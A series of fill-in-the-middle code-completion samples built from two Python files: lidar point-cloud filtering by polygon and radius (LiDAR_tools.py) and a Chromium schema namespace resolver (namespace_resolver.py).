x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
<|fim_middle|>
return pts
<|fim▁end|> | print( "\t\t\t no points in neighbourhood") |
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def <|fim_middle|>(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside
p1x,p1y = p2x,p2y
return inside
# This one is my own version of the ray-trace algorithm which utilises the numpy arrays so that a list of x and y coordinates can be processed in one call and only points inside polygon are returned alongside the indices in case required for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within circular neighbourhood, Terget point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar wth polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | point_in_poly |
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside
p1x,p1y = p2x,p2y
return inside
# This one is my own version of the ray-trace algorithm which utilises the numpy arrays so that a list of x and y coordinates can be processed in one call and only points inside polygon are returned alongside the indices in case required for future referencing. This saves a fair bit of looping.
def <|fim_middle|>(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within circular neighbourhood, Terget point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar wth polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | points_in_poly |
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside
p1x,p1y = p2x,p2y
return inside
# This one is my own version of the ray-trace algorithm which utilises the numpy arrays so that a list of x and y coordinates can be processed in one call and only points inside polygon are returned alongside the indices in case required for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within circular neighbourhood, Terget point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points
def <|fim_middle|>(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar wth polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | points_in_radius |
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside
p1x,p1y = p2x,p2y
return inside
# This one is my own version of the ray-trace algorithm which utilises the numpy arrays so that a list of x and y coordinates can be processed in one call and only points inside polygon are returned alongside the indices in case required for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within circular neighbourhood, Terget point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar wth polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def <|fim_middle|>(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | filter_lidar_data_by_polygon |
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside
p1x,p1y = p2x,p2y
return inside
# This one is my own version of the ray-trace algorithm which utilises the numpy arrays so that a list of x and y coordinates can be processed in one call and only points inside polygon are returned alongside the indices in case required for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within circular neighbourhood, Terget point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar wth polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def <|fim_middle|>(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | filter_lidar_data_by_neighbourhood |
<|file_name|>namespace_resolver.py<|end_file_name|><|fim▁begin|># Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from cpp_namespace_environment import CppNamespaceEnvironment
from model import Model, UnixName
from schema_loader import SchemaLoader
def _GenerateFilenames(full_namespace):
# Try to find the file defining the namespace. Eg. for
# nameSpace.sub_name_space.Type' the following heuristics looks for:
# 1. name_space_sub_name_space.json,
# 2. name_space_sub_name_space.idl,
# 3. sub_name_space.json,
# 4. sub_name_space.idl,
# 5. etc.
sub_namespaces = full_namespace.split('.')
filenames = [ ]
basename = None
for namespace in reversed(sub_namespaces):
if basename is not None:
basename = UnixName(namespace + '.' + basename)
else:
basename = UnixName(namespace)
for ext in ['json', 'idl']:
filenames.append('%s.%s' % (basename, ext))
return filenames
class NamespaceResolver(object):
'''Resolves a type name into the namespace the type belongs to.
- |root| path to the root directory.
- |path| path to the directory with the API header files, relative to the
root.
- |include_rules| List containing tuples with (path, cpp_namespace_pattern)
used when searching for types.
- |cpp_namespace_pattern| Default namespace pattern
'''
def __init__(self, root, path, include_rules, cpp_namespace_pattern):
self._root = root
self._include_rules = [(path, cpp_namespace_pattern)] + include_rules
def ResolveNamespace(self, full_namespace):
'''Returns the model.Namespace object associated with the |full_namespace|,
or None if one can't be found.
'''
filenames = _GenerateFilenames(full_namespace)
for path, cpp_namespace in self._include_rules:
cpp_namespace_environment = None
if cpp_namespace:
cpp_namespace_environment = CppNamespaceEnvironment(cpp_namespace)
for filename in reversed(filenames):
filepath = os.path.join(path, filename);<|fim▁hole|> schema = SchemaLoader(self._root).LoadSchema(filepath)[0]
return Model().AddNamespace(
schema,
filepath,
environment=cpp_namespace_environment)
return None
def ResolveType(self, full_name, default_namespace):
'''Returns the model.Namespace object where the type with the given
|full_name| is defined, or None if one can't be found.
'''
name_parts = full_name.rsplit('.', 1)
if len(name_parts) == 1:
if full_name not in default_namespace.types:
return None
return default_namespace
full_namespace, type_name = full_name.rsplit('.', 1)
namespace = self.ResolveNamespace(full_namespace)
if namespace and type_name in namespace.types:
return namespace
return None<|fim▁end|> | if os.path.exists(os.path.join(self._root, filepath)): |
<|file_name|>namespace_resolver.py<|end_file_name|><|fim▁begin|># Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from cpp_namespace_environment import CppNamespaceEnvironment
from model import Model, UnixName
from schema_loader import SchemaLoader
def _GenerateFilenames(full_namespace):
# Try to find the file defining the namespace. Eg. for
# nameSpace.sub_name_space.Type' the following heuristics looks for:
# 1. name_space_sub_name_space.json,
# 2. name_space_sub_name_space.idl,
# 3. sub_name_space.json,
# 4. sub_name_space.idl,
# 5. etc.
<|fim_middle|>
class NamespaceResolver(object):
'''Resolves a type name into the namespace the type belongs to.
- |root| path to the root directory.
- |path| path to the directory with the API header files, relative to the
root.
- |include_rules| List containing tuples with (path, cpp_namespace_pattern)
used when searching for types.
- |cpp_namespace_pattern| Default namespace pattern
'''
def __init__(self, root, path, include_rules, cpp_namespace_pattern):
self._root = root
self._include_rules = [(path, cpp_namespace_pattern)] + include_rules
def ResolveNamespace(self, full_namespace):
'''Returns the model.Namespace object associated with the |full_namespace|,
or None if one can't be found.
'''
filenames = _GenerateFilenames(full_namespace)
for path, cpp_namespace in self._include_rules:
cpp_namespace_environment = None
if cpp_namespace:
cpp_namespace_environment = CppNamespaceEnvironment(cpp_namespace)
for filename in reversed(filenames):
filepath = os.path.join(path, filename);
if os.path.exists(os.path.join(self._root, filepath)):
schema = SchemaLoader(self._root).LoadSchema(filepath)[0]
return Model().AddNamespace(
schema,
filepath,
environment=cpp_namespace_environment)
return None
def ResolveType(self, full_name, default_namespace):
'''Returns the model.Namespace object where the type with the given
|full_name| is defined, or None if one can't be found.
'''
name_parts = full_name.rsplit('.', 1)
if len(name_parts) == 1:
if full_name not in default_namespace.types:
return None
return default_namespace
full_namespace, type_name = full_name.rsplit('.', 1)
namespace = self.ResolveNamespace(full_namespace)
if namespace and type_name in namespace.types:
return namespace
return None
<|fim▁end|> | sub_namespaces = full_namespace.split('.')
filenames = [ ]
basename = None
for namespace in reversed(sub_namespaces):
if basename is not None:
basename = UnixName(namespace + '.' + basename)
else:
basename = UnixName(namespace)
for ext in ['json', 'idl']:
filenames.append('%s.%s' % (basename, ext))
return filenames |
<|file_name|>namespace_resolver.py<|end_file_name|><|fim▁begin|># Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from cpp_namespace_environment import CppNamespaceEnvironment
from model import Model, UnixName
from schema_loader import SchemaLoader
def _GenerateFilenames(full_namespace):
# Try to find the file defining the namespace. Eg. for
# nameSpace.sub_name_space.Type' the following heuristics looks for:
# 1. name_space_sub_name_space.json,
# 2. name_space_sub_name_space.idl,
# 3. sub_name_space.json,
# 4. sub_name_space.idl,
# 5. etc.
sub_namespaces = full_namespace.split('.')
filenames = [ ]
basename = None
for namespace in reversed(sub_namespaces):
if basename is not None:
basename = UnixName(namespace + '.' + basename)
else:
basename = UnixName(namespace)
for ext in ['json', 'idl']:
filenames.append('%s.%s' % (basename, ext))
return filenames
class NamespaceResolver(object):
<|fim_middle|>
<|fim▁end|> | '''Resolves a type name into the namespace the type belongs to.
- |root| path to the root directory.
- |path| path to the directory with the API header files, relative to the
root.
- |include_rules| List containing tuples with (path, cpp_namespace_pattern)
used when searching for types.
- |cpp_namespace_pattern| Default namespace pattern
'''
def __init__(self, root, path, include_rules, cpp_namespace_pattern):
self._root = root
self._include_rules = [(path, cpp_namespace_pattern)] + include_rules
def ResolveNamespace(self, full_namespace):
'''Returns the model.Namespace object associated with the |full_namespace|,
or None if one can't be found.
'''
filenames = _GenerateFilenames(full_namespace)
for path, cpp_namespace in self._include_rules:
cpp_namespace_environment = None
if cpp_namespace:
cpp_namespace_environment = CppNamespaceEnvironment(cpp_namespace)
for filename in reversed(filenames):
filepath = os.path.join(path, filename);
if os.path.exists(os.path.join(self._root, filepath)):
schema = SchemaLoader(self._root).LoadSchema(filepath)[0]
return Model().AddNamespace(
schema,
filepath,
environment=cpp_namespace_environment)
return None
def ResolveType(self, full_name, default_namespace):
'''Returns the model.Namespace object where the type with the given
|full_name| is defined, or None if one can't be found.
'''
name_parts = full_name.rsplit('.', 1)
if len(name_parts) == 1:
if full_name not in default_namespace.types:
return None
return default_namespace
full_namespace, type_name = full_name.rsplit('.', 1)
namespace = self.ResolveNamespace(full_namespace)
if namespace and type_name in namespace.types:
return namespace
return None |
<|file_name|>namespace_resolver.py<|end_file_name|><|fim▁begin|># Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from cpp_namespace_environment import CppNamespaceEnvironment
from model import Model, UnixName
from schema_loader import SchemaLoader
def _GenerateFilenames(full_namespace):
# Try to find the file defining the namespace. Eg. for
# nameSpace.sub_name_space.Type' the following heuristics looks for:
# 1. name_space_sub_name_space.json,
# 2. name_space_sub_name_space.idl,
# 3. sub_name_space.json,
# 4. sub_name_space.idl,
# 5. etc.
sub_namespaces = full_namespace.split('.')
filenames = [ ]
basename = None
for namespace in reversed(sub_namespaces):
if basename is not None:
basename = UnixName(namespace + '.' + basename)
else:
basename = UnixName(namespace)
for ext in ['json', 'idl']:
filenames.append('%s.%s' % (basename, ext))
return filenames
class NamespaceResolver(object):
'''Resolves a type name into the namespace the type belongs to.
- |root| path to the root directory.
- |path| path to the directory with the API header files, relative to the
root.
- |include_rules| List containing tuples with (path, cpp_namespace_pattern)
used when searching for types.
- |cpp_namespace_pattern| Default namespace pattern
'''
def __init__(self, root, path, include_rules, cpp_namespace_pattern):
<|fim_middle|>
def ResolveNamespace(self, full_namespace):
'''Returns the model.Namespace object associated with the |full_namespace|,
or None if one can't be found.
'''
filenames = _GenerateFilenames(full_namespace)
for path, cpp_namespace in self._include_rules:
cpp_namespace_environment = None
if cpp_namespace:
cpp_namespace_environment = CppNamespaceEnvironment(cpp_namespace)
for filename in reversed(filenames):
filepath = os.path.join(path, filename);
if os.path.exists(os.path.join(self._root, filepath)):
schema = SchemaLoader(self._root).LoadSchema(filepath)[0]
return Model().AddNamespace(
schema,
filepath,
environment=cpp_namespace_environment)
return None
def ResolveType(self, full_name, default_namespace):
'''Returns the model.Namespace object where the type with the given
|full_name| is defined, or None if one can't be found.
'''
name_parts = full_name.rsplit('.', 1)
if len(name_parts) == 1:
if full_name not in default_namespace.types:
return None
return default_namespace
full_namespace, type_name = full_name.rsplit('.', 1)
namespace = self.ResolveNamespace(full_namespace)
if namespace and type_name in namespace.types:
return namespace
return None
<|fim▁end|> | self._root = root
self._include_rules = [(path, cpp_namespace_pattern)] + include_rules |
<|file_name|>namespace_resolver.py<|end_file_name|><|fim▁begin|># Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from cpp_namespace_environment import CppNamespaceEnvironment
from model import Model, UnixName
from schema_loader import SchemaLoader
def _GenerateFilenames(full_namespace):
# Try to find the file defining the namespace. Eg. for
# nameSpace.sub_name_space.Type' the following heuristics looks for:
# 1. name_space_sub_name_space.json,
# 2. name_space_sub_name_space.idl,
# 3. sub_name_space.json,
# 4. sub_name_space.idl,
# 5. etc.
sub_namespaces = full_namespace.split('.')
filenames = [ ]
basename = None
for namespace in reversed(sub_namespaces):
if basename is not None:
basename = UnixName(namespace + '.' + basename)
else:
basename = UnixName(namespace)
for ext in ['json', 'idl']:
filenames.append('%s.%s' % (basename, ext))
return filenames
class NamespaceResolver(object):
'''Resolves a type name into the namespace the type belongs to.
- |root| path to the root directory.
- |path| path to the directory with the API header files, relative to the
root.
- |include_rules| List containing tuples with (path, cpp_namespace_pattern)
used when searching for types.
- |cpp_namespace_pattern| Default namespace pattern
'''
def __init__(self, root, path, include_rules, cpp_namespace_pattern):
self._root = root
self._include_rules = [(path, cpp_namespace_pattern)] + include_rules
def ResolveNamespace(self, full_namespace):
<|fim_middle|>
def ResolveType(self, full_name, default_namespace):
'''Returns the model.Namespace object where the type with the given
|full_name| is defined, or None if one can't be found.
'''
name_parts = full_name.rsplit('.', 1)
if len(name_parts) == 1:
if full_name not in default_namespace.types:
return None
return default_namespace
full_namespace, type_name = full_name.rsplit('.', 1)
namespace = self.ResolveNamespace(full_namespace)
if namespace and type_name in namespace.types:
return namespace
return None
<|fim▁end|> | '''Returns the model.Namespace object associated with the |full_namespace|,
or None if one can't be found.
'''
filenames = _GenerateFilenames(full_namespace)
for path, cpp_namespace in self._include_rules:
cpp_namespace_environment = None
if cpp_namespace:
cpp_namespace_environment = CppNamespaceEnvironment(cpp_namespace)
for filename in reversed(filenames):
filepath = os.path.join(path, filename);
if os.path.exists(os.path.join(self._root, filepath)):
schema = SchemaLoader(self._root).LoadSchema(filepath)[0]
return Model().AddNamespace(
schema,
filepath,
environment=cpp_namespace_environment)
return None |
<|file_name|>namespace_resolver.py<|end_file_name|><|fim▁begin|># Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
